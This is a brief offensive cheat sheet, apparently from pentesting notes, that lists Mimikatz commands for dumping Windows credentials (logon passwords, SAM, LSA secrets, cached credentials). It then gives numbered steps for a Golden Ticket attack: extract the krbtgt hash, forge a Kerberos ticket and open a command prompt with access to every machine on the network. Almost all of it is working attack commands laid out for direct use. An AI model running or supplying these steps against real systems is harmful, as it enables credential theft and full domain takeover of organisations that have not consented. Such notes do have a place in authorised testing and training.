Mimikatz

privilege::debug
token::elevate

lsadump::cache
sekurlsa::logonPasswords
lsadump::sam
lsadump::lsa /patch

Golden Ticket with mimikatz

Dump the krbtgt Hash -

1.) cd downloads && mimikatz.exe

2.) privilege::debug ensure this outputs [privilege "20" ok]

3.) lsadump::lsa /inject /name:krbtgt This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket

Take note of what is outlined in red you'll need it to create the golden ticket

Create a Golden Ticket -

1.) kerberos::golden /user: /domain: /sid: /krbtgt: /id:

Use the Golden Ticket to access other machine -

1.) misc::cmd - This will open a new command prompt with elevated privileges to all machines

2.) Access other Machines! - You will now have another command prompt with access to all other machines on the network

Last updated